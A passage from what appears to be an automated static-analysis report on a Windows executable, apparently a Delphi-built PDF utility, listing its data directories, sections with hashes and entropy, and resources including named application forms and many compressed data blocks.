                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x7c20000x18.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x7bbb200x9a4.idata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x7bf0000xe06.didata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x5d09c80x5d0a005b92377a7a8661f70a13742a14fd2326unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .itext0x5d20000x39a80x3a00618a1eb0400f32a57ff05405c91a0755False0.4857893318965517data6.148050334224838IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .data0x5d60000x25afc0x25c0066154e56c9542b521f5e08689154755fFalse0.38093051531456956data5.838264883060502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .bss0x5fc0000x1be2f40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .idata0x7bb0000x3ee20x400099f49c0741ca6201b15d7729d418e107False0.32635498046875data5.23934204186308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .didata0x7bf0000xe060x100031315dbf55dbba6e8d1e768bf9ac3b9cFalse0.31787109375data4.074208107173615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .edata0x7c00000x9b0x2001a82cdbd2da8404d0d427b18adcfe87fFalse0.2578125data1.8184376157820663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .tls0x7c10000x540x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rdata0x7c20000x5d0x200a5f40a305a312eb3fade2f0c1c6fc10dFalse0.189453125data1.3716899805431133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x7c30000x68d580x68e001c1b2fa52739d9f264a96f4acc9b929dFalse0.6061601422824792data6.761515718855164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x82c0000x470c880x470e007edb304dfcef9421729da13cfc317864unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      CLXO0x8305580x16bce5PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlacedEnglishUnited States0.99542236328125
                                                                                                      COLOR0x99c2400x4data3.0
                                                                                                      COLOR0x99c2440x4data3.0
                                                                                                      COLOR0x99c2480x4data3.0
                                                                                                      RT_CURSOR0x99c24c0x134dataEnglishUnited States0.43506493506493504
                                                                                                      RT_CURSOR0x99c3800x134dataEnglishUnited States0.4642857142857143
                                                                                                      RT_CURSOR0x99c4b40x134dataEnglishUnited States0.4805194805194805
                                                                                                      RT_CURSOR0x99c5e80x134dataEnglishUnited States0.38311688311688313
                                                                                                      RT_CURSOR0x99c71c0x134dataEnglishUnited States0.36038961038961037
                                                                                                      RT_CURSOR0x99c8500x134dataEnglishUnited States0.4090909090909091
                                                                                                      RT_CURSOR0x99c9840x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                      RT_CURSOR0x99cab80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                      RT_BITMAP0x99cbec0x528Device independent bitmap graphic, 20 x 16 x 32, image size 12800.048484848484848485
                                                                                                      RT_BITMAP0x99d1140x468Device independent bitmap graphic, 17 x 16 x 32, image size 10880.07446808510638298
                                                                                                      RT_BITMAP0x99d57c0x5a8Device independent bitmap graphic, 16 x 22 x 32, image size 14080.0738950276243094
                                                                                                      RT_BITMAP0x99db240x600Device independent bitmap graphic, 17 x 22 x 32, image size 14960.043619791666666664
                                                                                                      RT_BITMAP0x99e1240x4e8Device independent bitmap graphic, 19 x 16 x 32, image size 12160.05015923566878981
                                                                                                      RT_BITMAP0x99e60c0x5a8Device independent bitmap graphic, 16 x 22 x 32, image size 14080.06284530386740332
                                                                                                      RT_BITMAP0x99ebb40x5a8Device independent bitmap graphic, 16 x 22 x 32, image size 14080.08287292817679558
                                                                                                      RT_BITMAP0x99f15c0x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.33270676691729323
                                                                                                      RT_BITMAP0x99f5840x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.23966165413533835
                                                                                                      RT_BITMAP0x99f9ac0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                                                                      RT_BITMAP0x99fa6c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                                                                      RT_BITMAP0x99fb4c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                                                                      RT_BITMAP0x99fc2c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                                                                      RT_BITMAP0x99fd0c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                                                                      RT_BITMAP0x99fdcc0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                                                                      RT_BITMAP0x99fe8c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                                                                      RT_BITMAP0x99ff6c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                                                                      RT_BITMAP0x9a002c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                                                                      RT_BITMAP0x9a010c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                      RT_BITMAP0x9a01f40xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                                                                      RT_BITMAP0x9a02b40x468Device independent bitmap graphic, 8 x 8 x 8, image size 640.424645390070922
                                                                                                      RT_BITMAP0x9a071c0x468Device independent bitmap graphic, 8 x 8 x 8, image size 640.4228723404255319
                                                                                                      RT_BITMAP0x9a0b840xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                                                      RT_ICON0x9a0c640x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.16290277243542325
                                                                                                      RT_ICON0x9e2c8c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.42738589211618255
                                                                                                      RT_ICON0x9e52340x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5124296435272045
                                                                                                      RT_ICON0x9e62dc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.475177304964539
                                                                                                      RT_DIALOG0x9e67440x52data0.7682926829268293
                                                                                                      RT_DIALOG0x9e67980x52data0.7560975609756098
                                                                                                      RT_STRING0x9e67ec0x1bcdata0.5202702702702703
                                                                                                      RT_STRING0x9e69a80x368data0.4025229357798165
                                                                                                      RT_STRING0x9e6d100x438data0.37777777777777777
                                                                                                      RT_STRING0x9e71480x9b8data0.27773311897106107
                                                                                                      RT_STRING0x9e7b000x964data0.27579034941763725
                                                                                                      RT_STRING0x9e84640x4d4data0.36650485436893204
                                                                                                      RT_STRING0x9e89380x390AmigaOS bitmap font "s", fc_YSize 30208, 9472 elements, 2nd "l", 3rd "r"0.3333333333333333
                                                                                                      RT_STRING0x9e8cc80x230data0.5160714285714286
                                                                                                      RT_STRING0x9e8ef80x408data0.40794573643410853
                                                                                                      RT_STRING0x9e93000x18cdata0.5808080808080808
                                                                                                      RT_STRING0x9e948c0xccdata0.6666666666666666
                                                                                                      RT_STRING0x9e95580x114data0.6086956521739131
                                                                                                      RT_STRING0x9e966c0x294data0.4712121212121212
                                                                                                      RT_STRING0x9e99000x3acdata0.39787234042553193
                                                                                                      RT_STRING0x9e9cac0x3c4data0.3724066390041494
                                                                                                      RT_STRING0x9ea0700x490data0.3279109589041096
                                                                                                      RT_STRING0x9ea5000x308data0.3337628865979381
                                                                                                      RT_STRING0x9ea8080x3a8data0.4337606837606838
                                                                                                      RT_STRING0x9eabb00x638data0.332286432160804
                                                                                                      RT_STRING0x9eb1e80x424data0.33773584905660375
                                                                                                      RT_STRING0x9eb60c0x344data0.430622009569378
                                                                                                      RT_STRING0x9eb9500x328data0.375
                                                                                                      RT_STRING0x9ebc780x43cdata0.39206642066420666
                                                                                                      RT_STRING0x9ec0b40x1acdata0.4672897196261682
                                                                                                      RT_STRING0x9ec2600xccdata0.6274509803921569
                                                                                                      RT_STRING0x9ec32c0x198data0.5612745098039216
                                                                                                      RT_STRING0x9ec4c40x3acdata0.3659574468085106
                                                                                                      RT_STRING0x9ec8700x360data0.38425925925925924
                                                                                                      RT_STRING0x9ecbd00x2dcdata0.38114754098360654
                                                                                                      RT_STRING0x9eceac0x334data0.3280487804878049
                                                                                                      RT_RCDATA0x9ed1e00xd5dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032154340836013
                                                                                                      RT_RCDATA0x9edf400xd57PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003221083455344
                                                                                                      RT_RCDATA0x9eec980xcfcPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003309265944645
                                                                                                      RT_RCDATA0x9ef9940xcd9PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033444816053512
                                                                                                      RT_RCDATA0x9f06700xd5dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032154340836013
                                                                                                      RT_RCDATA0x9f13d00xd57PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003221083455344
                                                                                                      RT_RCDATA0x9f21280xc4ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034920634920634
                                                                                                      RT_RCDATA0x9f2d780xc4ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034920634920634
                                                                                                      RT_RCDATA0x9f39c80xcb5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033814940055334
                                                                                                      RT_RCDATA0x9f46800xcb0PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033866995073892
                                                                                                      RT_RCDATA0x9f53300xd56PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032220269478618
                                                                                                      RT_RCDATA0x9f60880xd47PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032362459546926
                                                                                                      RT_RCDATA0x9f6dd00xdc2PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031232254400908
                                                                                                      RT_RCDATA0x9f7b940xdc5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031205673758865
                                                                                                      RT_RCDATA0x9f895c0xcf3PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003318250377074
                                                                                                      RT_RCDATA0x9f96500xcedPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033242671501965
                                                                                                      RT_RCDATA0x9fa3400xda9PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031455533314269
                                                                                                      RT_RCDATA0x9fb0ec0xda6PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031482541499714
                                                                                                      RT_RCDATA0x9fbe940xcf3PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003318250377074
                                                                                                      RT_RCDATA0x9fcb880xcedPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033242671501965
                                                                                                      RT_RCDATA0x9fd8780x10data1.5
                                                                                                      RT_RCDATA0x9fd8880x148bPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020916524054002
                                                                                                      RT_RCDATA0x9fed140x111ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025102692834322
                                                                                                      RT_RCDATA0x9ffe340xd8cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031718569780854
                                                                                                      RT_RCDATA0xa00bc00x15e0data0.435
                                                                                                      RT_RCDATA0xa021a00x2dataEnglishUnited States5.0
                                                                                                      RT_RCDATA0xa021a40xe65aDelphi compiled form 'Tfrm_About'0.9792606410039003
                                                                                                      RT_RCDATA0xa108000x14c3Delphi compiled form 'Tfrm_Delete'0.34111006585136405
                                                                                                      RT_RCDATA0xa11cc40x1233Delphi compiled form 'Tfrm_DOCtoPDF'0.35651427344923803
                                                                                                      RT_RCDATA0xa12ef80x1bf1Delphi compiled form 'Tfrm_Encrypt'0.31553194463861317
                                                                                                      RT_RCDATA0xa14aec0x1354Delphi compiled form 'Tfrm_Extract'0.34620048504446244
                                                                                                      RT_RCDATA0xa15e400x5b8Delphi compiled form 'Tfrm_ExtractText'0.5095628415300546
                                                                                                      RT_RCDATA0xa163f80x14e3Delphi compiled form 'Tfrm_ImagetoPDF'0.3596409201421358
                                                                                                      RT_RCDATA0xa178dc0xf9eDelphi compiled form 'Tfrm_Info'0.3114057028514257
                                                                                                      RT_RCDATA0xa1887c0x157fDelphi compiled form 'Tfrm_InsertMove'0.34217699436670906
                                                                                                      RT_RCDATA0xa19dfc0xb88Delphi compiled form 'Tfrm_Key'0.8167344173441734
                                                                                                      RT_RCDATA0xa1a9840x17d53Delphi compiled form 'Tfrm_Main'0.4803368196764974
                                                                                                      RT_RCDATA0xa326d80xf5aDelphi compiled form 'Tfrm_Metadata'0.3697201017811705
                                                                                                      RT_RCDATA0xa336340x4bbDelphi compiled form 'Tfrm_Options'0.5136251032204789
                                                                                                      RT_RCDATA0xa33af00x3b0Delphi compiled form 'Tfrm_Password'0.5720338983050848
                                                                                                      RT_RCDATA0xa33ea00xf94Delphi compiled form 'Tfrm_PDFtoDOC'0.3688565697091274
                                                                                                      RT_RCDATA0xa34e340xf61Delphi compiled form 'Tfrm_PDFtoImage'0.36423672847345695
                                                                                                      RT_RCDATA0xa35d980xf64Delphi compiled form 'Tfrm_PDFtoPDF'0.3774111675126904
                                                                                                      RT_RCDATA0xa36cfc0xf38Delphi compiled form 'Tfrm_PDFtoTXT'0.37217659137577
                                                                                                      RT_RCDATA0xa37c340x4b1bDelphi compiled form 'Tfrm_Preview'0.6656784729807043
                                                                                                      RT_RCDATA0xa3c7500x4bfDelphi compiled form 'Tfrm_ProcessText'0.5242798353909465
                                                                                                      RT_RCDATA0xa3cc100x1273Delphi compiled form 'Tfrm_Rename'0.3506246030065636
                                                                                                      RT_RCDATA0xa3de840x1b20Delphi compiled form 'Tfrm_RotateCrop'0.2955069124423963
                                                                                                      RT_RCDATA0xa3f9a40x354Delphi compiled form 'Tfrm_Search'0.5915492957746479
                                                                                                      RT_RCDATA0xa3fcf80x24aeDelphi compiled form 'Tfrm_Sign'0.24877529286474973
                                                                                                      RT_RCDATA0xa421a80x1469Delphi compiled form 'Tfrm_Split'0.3508133971291866
                                                                                                      RT_RCDATA0xa436140x5575Delphi compiled form 'Tfrm_Trial'0.8870046167207569
                                                                                                      RT_RCDATA0xa48b8c0x14e6Delphi compiled form 'Tfrm_TXTtoPDF'0.37009345794392523
                                                                                                      RT_RCDATA0xa4a0740x978Delphi compiled form 'Tfrm_Update'0.7326732673267327
                                                                                                      RT_RCDATA0xa4a9ec0x139fDelphi compiled form 'Tfrm_Upgrade'0.4690424049372885
                                                                                                      RT_RCDATA0xa4bd8c0x2a5dDelphi compiled form 'Tfrm_Watermark'0.35813739050253574
                                                                                                      RT_RCDATA0xa4e7ec0x2addDelphi compiled form 'Tfrm_WatermarkNum'0.35477991433518635
                                                                                                      RT_RCDATA0xa512cc0x2bdbDelphi compiled form 'Tfrm_WatermarkText'0.35387904159615213
                                                                                                      RT_RCDATA0xa53ea80x16eazlib compressed dataEnglishAustralia1.001875213092397
                                                                                                      RT_RCDATA0xa555940x560zlib compressed dataEnglishAustralia1.0079941860465116
                                                                                                      RT_RCDATA0xa55af40x1693zlib compressed dataEnglishAustralia1.001903443502336
                                                                                                      RT_RCDATA0xa571880x1721zlib compressed dataEnglishAustralia1.0018577942915048
                                                                                                      RT_RCDATA0xa588ac0x567zlib compressed dataEnglishAustralia1.0079537237888647
                                                                                                      RT_RCDATA0xa58e140x55dzlib compressed dataEnglishAustralia1.0080116533139112
                                                                                                      RT_RCDATA0xa593740x1996zlib compressed dataEnglishAustralia1.0016793893129772
                                                                                                      RT_RCDATA0xa5ad0c0x6d5zlib compressed dataEnglishAustralia1.0062893081761006
                                                                                                      RT_RCDATA0xa5b3e40xb87zlib compressed dataEnglishAustralia1.0037275499830567
                                                                                                      RT_RCDATA0xa5bf6c0xa22zlib compressed dataEnglishAustralia1.0042405551272167
                                                                                                      RT_RCDATA0xa5c9900x6dfzlib compressed dataEnglishAustralia1.006253553155202
                                                                                                      RT_RCDATA0xa5d0700xa05zlib compressed dataEnglishAustralia1.0042884990253411
                                                                                                      RT_RCDATA0xa5da780x6d3zlib compressed dataEnglishAustralia1.0062965082999427
                                                                                                      RT_RCDATA0xa5e14c0xc96zlib compressed dataEnglishAustralia1.0024829298572315
                                                                                                      RT_RCDATA0xa5ede40x623zlib compressed dataEnglishAustralia1.0070019096117122
                                                                                                      RT_RCDATA0xa5f4080x16e5zlib compressed dataEnglishAustralia1.001876812830575
                                                                                                      RT_RCDATA0xa60af00x176fzlib compressed dataEnglishAustralia1.0018336389398232
                                                                                                      RT_RCDATA0xa622600x64dzlib compressed dataEnglishAustralia1.0068195908245505
                                                                                                      RT_RCDATA0xa628b00x642zlib compressed dataEnglishAustralia1.0068664169787764
                                                                                                      RT_RCDATA0xa62ef40x68czlib compressed dataEnglishAustralia1.0041766109785202
                                                                                                      RT_RCDATA0xa635800x6e3zlib compressed dataEnglishAustralia1.0062393647192285
                                                                                                      RT_RCDATA0xa63c640x6eazlib compressed dataEnglishAustralia1.0062146892655368
                                                                                                      RT_RCDATA0xa643500x713zlib compressed dataEnglishAustralia1.0060739922694644
                                                                                                      RT_RCDATA0xa64a640x71azlib compressed dataEnglishAustralia1.006050605060506
                                                                                                      RT_RCDATA0xa651800x71azlib compressed dataEnglishAustralia1.006050605060506
                                                                                                      RT_RCDATA0xa6589c0x71bzlib compressed dataEnglishAustralia1.006047278724574
                                                                                                      RT_RCDATA0xa65fb80x5bezlib compressed dataEnglishAustralia1.0074829931972789
                                                                                                      RT_RCDATA0xa665780x607zlib compressed dataEnglishAustralia1.0071289695398573
                                                                                                      RT_RCDATA0xa66b800x785zlib compressed dataEnglishAustralia1.0057142857142858
                                                                                                      RT_RCDATA0xa673080x783zlib compressed dataEnglishAustralia1.0041601664066562
                                                                                                      RT_RCDATA0xa67a8c0x856zlib compressed dataEnglishAustralia0.9915651358950328
                                                                                                      RT_RCDATA0xa682e40x87fzlib compressed dataEnglishAustralia0.9862068965517241
                                                                                                      RT_RCDATA0xa68b640x5d5zlib compressed dataEnglishAustralia1.0073677160080374
                                                                                                      RT_RCDATA0xa6913c0x5d7zlib compressed dataEnglishAustralia1.0073578595317725
                                                                                                      RT_RCDATA0xa697140x5e5zlib compressed dataEnglishAustralia1.0072895957587806
                                                                                                      RT_RCDATA0xa69cfc0x5eazlib compressed dataEnglishAustralia1.0072655217965654
                                                                                                      RT_RCDATA0xa6a2e80x6aczlib compressed dataEnglishAustralia1.006440281030445
                                                                                                      RT_RCDATA0xa6a9940x744zlib compressed dataEnglishAustralia1.0059139784946236
                                                                                                      RT_RCDATA0xa6b0d80x79czlib compressed dataEnglishAustralia0.9994866529774127
                                                                                                      RT_RCDATA0xa6b8740x5eezlib compressed dataEnglishAustralia1.0072463768115942
                                                                                                      RT_RCDATA0xa6be640x709zlib compressed dataEnglishAustralia1.0038867295946696
                                                                                                      RT_RCDATA0xa6c5700x704zlib compressed dataEnglishAustralia1.0011135857461024
                                                                                                      RT_RCDATA0xa6cc740xca6zlib compressed dataEnglishAustralia1.003397158739963
                                                                                                      RT_RCDATA0xa6d91c0x4f7zlib compressed dataEnglishAustralia1.008654602675059
                                                                                                      RT_RCDATA0xa6de140xcbfzlib compressed dataEnglishAustralia1.0033711308611708
                                                                                                      RT_RCDATA0xa6ead40x4f9zlib compressed dataEnglishAustralia1.0086410054988217
                                                                                                      RT_RCDATA0xa6efd00xff1zlib compressed dataEnglishAustralia0.9960793923058074
                                                                                                      RT_RCDATA0xa6ffc40x10f5zlib compressed dataEnglishAustralia0.9944713199723566
                                                                                                      RT_RCDATA0xa710bc0x961zlib compressed dataEnglishAustralia1.0045814244064972
                                                                                                      RT_RCDATA0xa71a200x4f3zlib compressed dataEnglishAustralia1.0086819258089976
                                                                                                      RT_RCDATA0xa71f140x755zlib compressed dataEnglishAustralia1.0
                                                                                                      RT_RCDATA0xa7266c0x481zlib compressed dataEnglishAustralia1.0095403295750216
                                                                                                      RT_RCDATA0xa72af00xd00zlib compressed dataEnglishAustralia1.0033052884615385
                                                                                                      RT_RCDATA0xa737f00x50bzlib compressed dataEnglishAustralia1.0085205267234703
                                                                                                      RT_RCDATA0xa73cfc0x496zlib compressed dataEnglishAustralia1.0093696763202726
                                                                                                      RT_RCDATA0xa741940x521zlib compressed dataEnglishAustralia1.0083777608530085
                                                                                                      RT_RCDATA0xa746b80x24e0zlib compressed dataEnglishAustralia1.0011652542372882
                                                                                                      RT_RCDATA0xa76b980x501zlib compressed dataEnglishAustralia1.0085870413739266
                                                                                                      RT_RCDATA0xa7709c0x89bzlib compressed dataEnglishAustralia0.9995460735360872
                                                                                                      RT_RCDATA0xa779380x568zlib compressed dataEnglishAustralia1.0079479768786128
                                                                                                      RT_RCDATA0xa77ea00x17cazlib compressed dataEnglishAustralia1.0018062397372742
                                                                                                      RT_RCDATA0xa7966c0x1856zlib compressed dataEnglishAustralia1.0017656500802568
                                                                                                      RT_RCDATA0xa7aec40x5cfzlib compressed dataEnglishAustralia1.007397444519166
                                                                                                      RT_RCDATA0xa7b4940x5c8zlib compressed dataEnglishAustralia1.0074324324324324
                                                                                                      RT_RCDATA0xa7ba5c0x7bdzlib compressed dataEnglishAustralia0.9919232710752145
                                                                                                      RT_RCDATA0xa7c21c0x537zlib compressed dataEnglishAustralia1.0082397003745318
                                                                                                      RT_RCDATA0xa7c7540x783zlib compressed dataEnglishAustralia0.9958398335933437
                                                                                                      RT_RCDATA0xa7ced80x535zlib compressed dataEnglishAustralia1.0082520630157539
                                                                                                      RT_RCDATA0xa7d4100x75abzlib compressed dataEnglishAustralia1.0004315639212562
                                                                                                      RT_RCDATA0xa849bc0x531zlib compressed dataEnglishAustralia1.0082768999247556
                                                                                                      RT_RCDATA0xa84ef00x8360zlib compressed dataEnglishAustralia0.904198382492864
                                                                                                      RT_RCDATA0xa8d2500x5cazlib compressed dataEnglishAustralia1.0074224021592442
                                                                                                      RT_RCDATA0xa8d81c0x75a1zlib compressed dataEnglishAustralia1.0005313319828646
                                                                                                      RT_RCDATA0xa94dc00x532zlib compressed dataEnglishAustralia1.0082706766917293
                                                                                                      RT_RCDATA0xa952f40x7cazlib compressed dataEnglishAustralia0.9944834503510531
                                                                                                      RT_RCDATA0xa95ac00x53azlib compressed dataEnglishAustralia1.008221225710015
                                                                                                      RT_RCDATA0xa95ffc0x45bazlib compressed dataEnglishAustralia0.9930532212885154
                                                                                                      RT_RCDATA0xa9a5b80x53bzlib compressed dataEnglishAustralia1.0082150858849888
                                                                                                      RT_RCDATA0xa9aaf40x4521zlib compressed dataEnglishAustralia0.9952534327852178
                                                                                                      RT_RCDATA0xa9f0180x537zlib compressed dataEnglishAustralia1.0082397003745318
                                                                                                      RT_RCDATA0xa9f5500x45cazlib compressed dataEnglishAustralia0.9933952759431323
                                                                                                      RT_RCDATA0xaa3b1c0x53dzlib compressed dataEnglishAustralia1.0082028337061895
                                                                                                      RT_RCDATA0xaa405c0x852zlib compressed dataEnglishAustralia1.003286384976526
                                                                                                      RT_RCDATA0xaa48b00x4f2zlib compressed dataEnglishAustralia1.0086887835703002
                                                                                                      RT_RCDATA0xaa4da40x4e5zlib compressed dataEnglishAustralia1.0087789305666401
                                                                                                      RT_RCDATA0xaa528c0x2220zlib compressed dataEnglishAustralia0.9892399267399268
                                                                                                      RT_RCDATA0xaa74ac0x4f6zlib compressed dataEnglishAustralia1.0086614173228345
                                                                                                      RT_RCDATA0xaa79a40x1f1fzlib compressed dataEnglishAustralia0.9870716706413958
                                                                                                      RT_RCDATA0xaa98c40x4f6zlib compressed dataEnglishAustralia1.0086614173228345
                                                                                                      RT_RCDATA0xaa9dbc0x15dczlib compressed dataEnglishAustralia1.001965689778413
                                                                                                      RT_RCDATA0xaab3980x4f7zlib compressed dataEnglishAustralia1.008654602675059
                                                                                                      RT_RCDATA0xaab8900x1523zlib compressed dataEnglishAustralia0.9955645906486786
                                                                                                      RT_RCDATA0xaacdb40x4f7zlib compressed dataEnglishAustralia1.008654602675059
                                                                                                      RT_RCDATA0xaad2ac0x18e5zlib compressed dataEnglishAustralia0.9937235211046603
                                                                                                      RT_RCDATA0xaaeb940x4f7zlib compressed dataEnglishAustralia1.008654602675059
                                                                                                      RT_RCDATA0xaaf08c0x24fbzlib compressed dataEnglishAustralia1.0011619309179254
                                                                                                      RT_RCDATA0xab15880x501zlib compressed dataEnglishAustralia1.0085870413739266
                                                                                                      RT_RCDATA0xab1a8c0xc79zlib compressed dataEnglishAustralia0.9004071406201065
                                                                                                      RT_RCDATA0xab27080x473zlib compressed dataEnglishAustralia1.009657594381036
                                                                                                      RT_RCDATA0xab2b7c0x4b5zlib compressed dataEnglishAustralia1.0091286307053942
                                                                                                      RT_RCDATA0xab30340x1262zlib compressed dataEnglishAustralia1.002337441563961
                                                                                                      RT_RCDATA0xab42980x51fzlib compressed dataEnglishAustralia1.0083905415713197
                                                                                                      RT_RCDATA0xab47b80x1219zlib compressed dataEnglishAustralia1.0023742715303259
                                                                                                      RT_RCDATA0xab59d40x78d2zlib compressed dataEnglishAustralia0.9838021338506304
                                                                                                      RT_RCDATA0xabd2a80x526zlib compressed dataEnglishAustralia1.0083459787556905
                                                                                                      RT_RCDATA0xabd7d00x51czlib compressed dataEnglishAustralia1.0084097859327217
                                                                                                      RT_RCDATA0xabdcec0x18d8zlib compressed dataEnglishAustralia0.9770440251572327
                                                                                                      RT_RCDATA0xabf5c40x18d6zlib compressed dataEnglishAustralia0.9767222396980182
                                                                                                      RT_RCDATA0xac0e9c0x51czlib compressed dataEnglishAustralia1.0084097859327217
                                                                                                      RT_RCDATA0xac13b80x523zlib compressed dataEnglishAustralia1.0083650190114068
                                                                                                      RT_RCDATA0xac18dc0x13abzlib compressed dataEnglishAustralia1.0021847070506456
                                                                                                      RT_RCDATA0xac2c880x521zlib compressed dataEnglishAustralia1.0083777608530085
                                                                                                      RT_RCDATA0xac31ac0x1a53zlib compressed dataEnglishAustralia1.0016322896572192
                                                                                                      RT_RCDATA0xac4c000x5f7zlib compressed dataEnglishAustralia1.0072036673215454
                                                                                                      RT_RCDATA0xac51f80x8b7zlib compressed dataEnglishAustralia0.9986553115194979
                                                                                                      RT_RCDATA0xac5ab00x56fzlib compressed dataEnglishAustralia1.0079079798705968
                                                                                                      RT_RCDATA0xac60200x4a4zlib compressed dataEnglishAustralia1.0092592592592593
                                                                                                      RT_RCDATA0xac64c40x1b4cazlib compressed dataEnglishAustralia0.9957430825090773
                                                                                                      RT_RCDATA0xae19900x502zlib compressed dataEnglishAustralia1.0085803432137286
                                                                                                      RT_RCDATA0xae1e940x172f7zlib compressed dataEnglishAustralia1.0003790790485116
                                                                                                      RT_RCDATA0xaf918c0x504zlib compressed dataEnglishAustralia1.0085669781931463
                                                                                                      RT_RCDATA0xaf96900x18748zlib compressed dataEnglishAustralia1.000409312355243
                                                                                                      RT_RCDATA0xb11dd80x50azlib compressed dataEnglishAustralia1.0085271317829458
                                                                                                      RT_RCDATA0xb122e40x17d19zlib compressed dataEnglishAustralia1.00036899990775
                                                                                                      RT_RCDATA0xb2a0000x509zlib compressed dataEnglishAustralia1.008533747090768
                                                                                                      RT_RCDATA0xb2a50c0x17542zlib compressed dataEnglishAustralia0.9973104213324403
